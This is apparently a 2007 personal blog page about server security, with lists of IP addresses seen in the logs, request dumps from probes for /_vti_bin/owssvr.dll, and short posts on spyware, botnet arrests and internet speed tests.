3 203.121.71.169 11
2 203.121.71.169 11
2 203.121.79.95 11
3 203.121.79.95 11
1 203.234.156.57 11
1 203.234.156.57 11
1 203.234.156.57 11
4 203.234.156.57 11
2 203.88.192.104 11
2 203.88.192.104 11
1 206.51.237.152 11
1 207.192.203.218 11
3 208.72.168.160 11
1 209.124.116.65 11
1 210.22.158.132 11
1 210.34.14.186 11
5 210.34.22.226 11
1 210.34.4.18 11
1 210.51.51.24 11
1 210.75.12.100 11
1 210.82.89.246 11
1 211.100.34.11 11
3 211.117.62.81 11
1 211.117.62.81 11
2 211.196.166.94 11
3 211.196.166.94 11
1 212.124.234.37 11
1 213.180.137.72 11
1 216.145.17.190 11
1 216.145.5.42 11
1 216.23.162.164 11
1 216.40.220.18 11
3 217.126.65.126 11
1 218.210.231.93 11
1 218.56.8.72 11
3 219.87.178.116 11
1 220.1.121.46 11
1 221.225.1.241 11
2 222.63.132.15 11
1 24.131.212.124 11
4 24.148.20.137 11
1 24.7.24.112 11
1 38.117.88.77 11
1 58.147.0.228 11
1 59.77.16.162 11
1 60.190.79.18 11
1 61.135.219.15 11
1 61.142.81.37 11
1 61.148.97.26 11
4 61.178.18.96 11
1 61.19.221.29 11
2 61.28.1.91 11
3 61.61.132.129 11
1 62.143.133.68 11
1 62.175.191.139 11
3 64.5.62.170 11
1 64.92.199.44 11
1 64.92.199.61 11
2 66.199.253.187 11
3 67.149.190.246 11
1 67.202.6.152 11
1 68.228.168.71 11
1 68.7.17.104 11
1 68.82.44.72 11
4 69.113.227.23 11
1 69.121.170.57 11
1 69.143.249.51 11
1 69.208.130.11 11
1 69.221.169.25 11
1 69.59.28.163 11
2 69.73.94.125 11
1 70.135.109.51 11
2 71.109.156.19 11
1 71.194.213.68 11
1 71.224.150.100 11
1 71.59.220.219 11
2 71.83.130.152 11
3 71.83.130.152 11
1 72.224.254.87 11
1 72.224.254.87 11
3 72.232.7.242 11
3 72.232.7.242 11
1 72.232.7.242 11
2 72.44.50.103 11
1 72.44.57.55 11
1 74.137.217.73 11
1 74.208.11.169 11
2 75.26.182.48 11
3 76.101.38.233 11
1 76.170.241.248 11
1 76.31.23.129 11
3 76.84.107.198 11
2 78.107.255.115 11
1 80.216.144.92 11
1 80.37.201.86 11
3 80.91.186.250 11
3 80.91.186.250 11
3 80.91.186.250 11
3 81.84.141.117 11
3 82.179.236.154 11
1 82.216.116.203 11
1 82.224.98.76 11
1 82.237.74.200 11
2 83.208.212.151 11
3 83.237.199.152 11
3 83.31.211.14 11
2 84.141.19.229 11
2 85.140.24.250 11
3 85.140.249.139 11
3 85.140.251.119 11
1 85.21.125.100 11
1 85.216.173.226 11
2 85.227.185.181 11
1 85.84.197.236 11
1 85.85.59.35 11
1 86.51.3.194 11
1 86.51.3.196 11
3 87.106.135.26 11
5 87.118.106.4 11
2 87.118.108.79 11
2 87.118.110.213 11
2 87.118.110.213 11
2 87.118.112.237 11
3 87.118.116.245 11
3 87.118.118.12 11
2 87.118.96.104 11
1 87.118.96.60 11
3 87.118.98.9 11
3 87.118.98.9 11
2 87.174.45.224 11
1 88.131.106.2 11
1 88.131.153.91 11
1 89.149.236.54 11
1 89.182.95.144 11
1 89.31.204.49 11
3 89.77.80.235 11
3 90.156.169.218 11
3 91.76.57.242 11

And here's October...

1 123.236.96.154 10
4 124.128.248.88 10
5 131.107.151.157 10
2 144.118.29.81 10
1 147.29.152.239 10
1 147.29.152.239 10
2 17.149.0.104 10
1 189.52.78.146 10
1 190.7.62.202 10
1 193.137.239.115 10
5 193.219.28.144 10
5 193.219.28.146 10
2 195.2.114.1 10
2 195.2.114.1 10
3 195.2.114.1 10
3 195.2.114.1 10
2 195.2.114.33 10
1 195.2.114.33 10
1 195.76.242.227 10
1 196.20.65.210 10
1 200.130.24.21 10
1 200.206.242.52 10
2 200.83.4.3 10
1 200.83.4.3 10
1 200.83.4.6 10
2 200.88.114.166 10
2 201.220.124.165 10
1 202.28.27.3 10
1 203.113.137.131 10
2 203.121.71.169 10
2 203.121.71.169 10
2 203.121.71.169 10
2 203.121.79.95 10
1 203.213.211.206 10
1 203.69.39.251 10
1 203.88.192.104 10
1 207.38.5.194 10
1 207.44.238.95 10
1 209.10.61.194 10
1 209.59.180.114 10
1 210.21.12.94 10
1 210.34.22.226 10
1 210.42.140.5 10
2 211.117.62.81 10
1 211.117.62.81 10
1 211.140.138.39 10
1 211.214.198.55 10
1 211.239.150.148 10
2 211.239.150.148 10
1 211.239.150.148 10
1 212.11.191.67 10
1 212.72.30.140 10
1 212.72.30.140 10
1 213.180.137.71 10
1 213.180.137.73 10
1 213.61.157.93 10
1 216.145.14.142 10
3 217.127.161.223 10
1 217.171.176.46 10
3 217.174.98.198 10
1 218.233.166.197 10
2 218.234.21.33 10
1 218.234.21.33 10
3 218.234.21.33 10
2 218.234.21.33 10
1 218.234.21.33 10
1 218.58.136.4 10
1 218.58.136.4 10
1 218.58.136.4 10
1 218.63.252.219 10
1 218.66.103.253 10
1 218.71.136.105 10
1 218.71.136.105 10
1 219.148.197.154 10
1 219.240.36.173 10
1 220.202.69.18 10
1 220.75.215.78 10
4 221.142.222.235 10
1 221.232.159.112 10
1 221.233.134.87 10
1 221.233.134.87 10
1 222.221.6.144 10
1 222.221.6.144 10
2 222.231.63.18 10
1 222.231.63.18 10
1 24.13.0.209 10
1 24.131.61.205 10
4 24.161.224.99 10
3 24.179.161.48 10
1 24.37.128.57 10
1 24.98.188.175 10
1 41.204.194.181 10
2 58.127.102.142 10
1 59.17.63.2 10
3 59.17.63.2 10
1 59.77.17.173 10
3 59.77.21.250 10
1 59.77.21.250 10
1 60.12.17.10 10
2 60.190.228.93 10
2 60.190.79.18 10
1 60.190.79.18 10
1 61.139.37.12 10
1 61.142.81.37 10
3 61.144.78.167 10
1 61.144.78.190 10
1 61.144.78.190 10
1 61.27.78.51 10
3 62.141.52.219 10
2 62.141.58.167 10
3 62.141.58.167 10
1 62.231.243.139 10
1 62.231.243.139 10
1 62.94.22.196 10
1 62.94.22.196 10
1 64.127.57.5 10
1 64.237.57.194 10
2 64.246.161.190 10
1 64.246.165.160 10
1 64.246.187.42 10
2 64.5.62.170 10
1 64.5.62.170 10
2 64.59.139.153 10
2 65.102.234.72 10
1 65.196.51.21 10
1 65.44.66.100 10
3 66.232.100.156 10
1 66.232.125.138 10
1 66.249.2.50 10
1 66.25.72.150 10
2 66.250.64.30 10
1 67.159.44.8 10
6 67.202.12.183 10
1 67.202.4.188 10
1 67.62.84.180 10
1 68.106.204.9 10
1 68.197.36.143 10
1 68.199.229.88 10
1 68.74.112.43 10
1 68.81.222.236 10
3 69.121.127.225 10
1 69.141.53.8 10
2 69.141.53.8 10
1 69.245.195.3 10
1 69.245.195.3 10
1 69.250.241.42 10
1 69.36.158.19 10
1 69.74.165.135 10
1 69.9.167.198 10
2 70.255.107.115 10
1 70.48.115.231 10
3 70.84.55.194 10
1 70.87.230.66 10
2 70.87.7.56 10
1 71.109.113.203 10
1 71.158.214.55 10
1 71.193.86.213 10
1 71.59.220.219 10
1 71.65.60.93 10
1 71.87.113.228 10
1 72.232.61.162 10
2 74.52.245.146 10
1 75.3.9.109 10
3 75.43.208.130 10
3 75.53.1.246 10
1 75.69.76.233 10
3 75.69.76.233 10
1 76.101.38.233 10
1 76.190.177.232 10
1 76.210.34.207 10
1 76.25.195.169 10
2 76.25.195.169 10
1 76.26.251.165 10
3 76.73.131.148 10
1 76.98.227.200 10
3 77.50.7.167 10
3 80.91.186.250 10
3 80.91.186.250 10
3 80.91.186.250 10
3 80.91.186.250 10
3 80.96.191.144 10
3 80.96.191.144 10
3 80.96.191.144 10
3 81.0.232.77 10
1 81.190.75.54 10
3 81.29.251.17 10
1 82.158.197.63 10
1 82.230.82.38 10
1 82.232.80.128 10
1 82.243.246.184 10
1 82.247.201.64 10
1 82.67.175.47 10
3 83.10.100.89 10
1 83.141.161.100 10
2 83.149.95.109 10
3 83.167.116.7 10
3 83.31.183.135 10
2 83.31.254.59 10
1 84.108.215.96 10
2 84.112.144.174 10
2 84.16.227.85 10
3 84.16.235.197 10
3 84.19.188.158 10
2 84.240.45.110 10
2 85.140.181.5 10
1 85.65.22.214 10
1 85.69.127.206 10
5 87.118.106.4 10
5 87.118.106.4 10
2 87.118.110.213 10
2 87.118.112.237 10
2 87.118.112.237 10
2 87.118.112.25 10
3 87.118.112.25 10
3 87.118.112.25 10
2 87.118.112.30 10
2 87.118.112.30 10
3 87.118.116.8 10
3 87.118.116.8 10
3 87.118.98.9 10
3 87.230.30.38 10
1 87.240.14.95 10
3 87.99.76.124 10
1 88.131.153.91 10
1 88.198.25.14 10
2 89.149.202.137 10
2 89.77.80.235 10
3 91.124.141.47 10
3 91.124.163.50 10
3 91.124.163.50 10
3 91.124.163.50 10
3 91.124.163.50 10
3 91.192.104.2 10
1 91.90.183.53 10
1 98.194.76.111 10

Solid Oak - Symantec flagged as virus - is it?

This company Solid Oak is complaining because Symantec flagged their software as a virus - this article has the details:

http://www.pcmag.com/article2/0,2704,2229576,00.asp

Now the company is complaining that because symantec deleted or disabled files in their program people had to "rebuild their entire operating systems".

I don't know about you but if some software is doing things that cause me to have to rebuild my entire operating system if it fails or gets deleted - I'd have to say what the heck is that software doing and I definitely wouldn't want it on my machine - for security reasons.

Someone should take a closer look at exactly what this software does exactly and why removal of files would have such a disastrous effect.

I wonder if PCMag checked to make sure that the real problem does not lie with the software vendor.

Wednesday, December 05, 2007

Server problems - related to /_vti_bin/owssvr.dll?

We got three requests for /_vti_bin/owssvr.dll a short time before our server had some serious issues. We were getting database connection errors and our SSL functionality was hosed. These requests were made by two different IPs. there is one similar request at the bottom from an earlier date. Some actions today also deleted all our request logs prior to: 05/12/2007:20:55:17 -0800

However I have some backup logs.

Not sure if the two are linked by here is more information so far related to this hack:

A few different requests were made, first from 216.104.48.200 and then from 130.76.32.144

Rquest details:
ipAddress: 216.104.48.200
server:
referer:
queryString: UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
method: GET
uri:
session: 27pg82u8olfo6
existing session
session created: Wed Dec 05 15:15:48 PST 2007Accept: */*
XVermeerContentType: application/octetstream
AcceptEncoding: gzip, deflate
UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host:
Connection: keepalive
CacheControl: nocache
CAPREQ: 0
STRMVER: 4
ACT: 4
BUILD: 6551
UL: 1

Could be this person at Valley Medical Center doesn't know their machine is hacked...or an accident by some IT person but I doubt it based on the consistency at which this appears in our logs.

OrgName: Valley Medical Center
OrgID: VMC-11
Address: 400 S 43rd Street
City: Renton
StateProv: WA
PostalCode: 98055
Country: US

NetRange: 216.104.48.0 - 216.104.63.255


Second set of requests for this particular file were from:

******WEBTOOLS.DUMPREQUEST**********
ipAddress: 130.76.32.144
server:
referer:
queryString: UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
servletPath:
method: GET
uri:
session: 3gero4ss5ih8m
new session
session created: Wed Dec 05 15:04:58 PST 2007Accept: */*
UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Boeing Kit; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host:
Connection: keepalive
XBlueCoatVia: 996B7CB4B02B592C
XVermeerContentType: application/octetstream
Pragma: nocache
CAPREQ: 0
STRMVER: 4
ACT: 4
BUILD: 6551
UL: 1
************

I also had a related but not exactly the same request from New Zeland IP 125.236.206.207

Could this be the same guy who was just stopped by the BotRoast program?

Network Speed Test Results

Here is a summary of speed test results:

Comcast "power boost" - 28922 KBPS download 1466 upload
Clearwire - approx 1200 download - 225 upload
AT&T Wireless Modem (Cellular)143 KPBS upload 170 kbps download
T-mobile hotspot at popular Starbucks - 1400 upload and download (may vary by location as I believe this is a fixed line from an ISP called The Planet.)
Qwest (not sure which specific service and this particular IP range has a name assigned to it- so I don't know if this is the service for the whole office building or what...) - 4172 download 431 upload

The story:

I am testing out a new Internet provider and have to say the guy was to the point and provided most excellent service. I tried uploads from this company and get constant speed of 25K - even 9K when FTP'ing files up to another location. He was able to quickly and thoroughly show me that their service is actually working at the speed they profess (well very close to it) and that probably this is a problem with the ftp server, VPN or something else on the network. So now...to my server hosting company and let's see if they can be as helpful in pinning down this problem.

Next I did a test to the part of the country in which my server is located. Same thing - I got good speed on this new network.

OK so that pins it down to either my computer, or the computer at the other end, or the VPN. Right? Unless it is my hosting providers network...so I start with my ftp software. I switch out WSFTP with Globalscape - and the average speed goes up to 88-95K. MUCH better....! More here FTP Software

So, back to Comcast. Now that I have this nifty little site I run the test on comcast network. At speedtest.net I get 28922 KBPS and 1466 KBPS. A file upload still is far less than these speeds report - about 300KBPS, though better than the other provider so far.

Note that the Comcast test was not done during peak hours. I will post more results later. Comcast degrades when more people are online so I need to compare at different times of day. Basically if you live in a crowded area with lots of other people on comacst in your area your speed will be slower because more people are sharing it. If you live next to a gamer and you use Comcast, I'm sorry.

Tuesday, December 04, 2007

IP looking for perl - eNet Inc.

IP looking for perl: 209.51.212.82

OrgName: eNET Inc.
OrgID: ENET
Address: 3000 East Dublin Granville Rd.
City: Columbus
StateProv: OH
PostalCode: 43231
Country: US

NetRange: 209.51.192.0 - 209.51.223.255

Monday, December 03, 2007

IPs trying to access /_vti_bin/owssvr.dll

The following IPs have been trying to access this file on our server: /_vti_bin/owssvr.dll


11/30/2007 5:15:55 PM 71.231.107.92
11/30/2007 5:15:41 PM 71.231.107.92
11/30/2007 3:48:04 PM 66.165.57.43
11/29/2007 4:12:52 PM 64.122.102.72
11/29/2007 4:12:38 PM 64.122.102.72
11/29/2007 3:09:41 PM 205.229.151.150
11/29/2007 3:07:34 PM 205.229.151.150
11/28/2007 11:30:07 AM 63.166.226.83
11/28/2007 12:56:21 AM 206.81.222.24
11/27/2007 9:09:48 AM 130.76.32.182
11/27/2007 9:09:35 AM 130.76.32.182

Some of these IPs belong to large companies such as Boeing, REI and F5 which I find somewhat odd. Are their servers hacked or people randomly hitting the wrong IP address on accident?

Fight Spam

I love this - if you hate spam, check out this site. Better yet, contribute to the fight:

Fight Spam

Spyware - biggest threat?

Some business owners feel spyware is the biggest threat suddenly:

Spyware threat

Spyware. Servers can be taken down - and rebuilt. Spam spewing out of servers is a big nasty pain. If someone takes over a server that is really bad because they can divert your revenue and steal your source code.

But spyware seems like the evilist of evils. Why? Because with spyware someone can do all of the above easily and more. With spyware someone can log all your passwords - like when you log into your online banking site or your server or VPN. Spyware can potentially allow reading any communications you are sending so someone can know what you want and are going to do before the third party to whom the message is being sent. For instance are you sending a quote? They can undercut your bid easily and woo your potential customer.

With spyware a hacker can learn about your infrastructure and potentially find ways to intercept, block and change messages in transit. I am not 100% certain how much of this is possible or why or why not -- but don't tell me it is not possible because hackers find a way to do everything.

If you know you have a hacker on your system and use your computer in any way to communicate about it, they can read it. A great engineer I knew who worked at Excite way back in the day said they were fighting a hacker and called him some name in an email communication. They then all got a response "My name is Jim".

How can you fight someone who knows your every move? Spyware is the ultimate cyber evil and cyber espionage tool.

And these days, hackers are more crafty and harder to spot than ever, so I could be sitting here typing this while some guy in Russia is reading every letter using a keylogger. How should I know?

List of Criminals Arrested for Bots

This article details criminals arrested for spreading bots:

Botnet Criminals

And here's another one of the criminals targeted by Botroast:

New Zealand Bot hacker

This one is interesting because I was getting a lot of bad traffic from a New Zealand network with the word "hug" in it. I wonder if this is related in any way.

Report Hacker Sites at Google

This is cool. Google set up a site to help catch hackers:
Google helps track down malicious sites

Governments Using Hackers - On The Rise

Governments using Internet espionage is nothing new. I've been posting links about this for a long time and suggesting it is more prevalent than we think here. So is this really "on the rise" or is it that people are just noticing it? I've been digging in the Internet trenches here for years and seeing oddities that look like a bit more than a 13 year old kid messing around...Whatever the reality is, I am glad someone is noticing:

Cyberattacks by Governments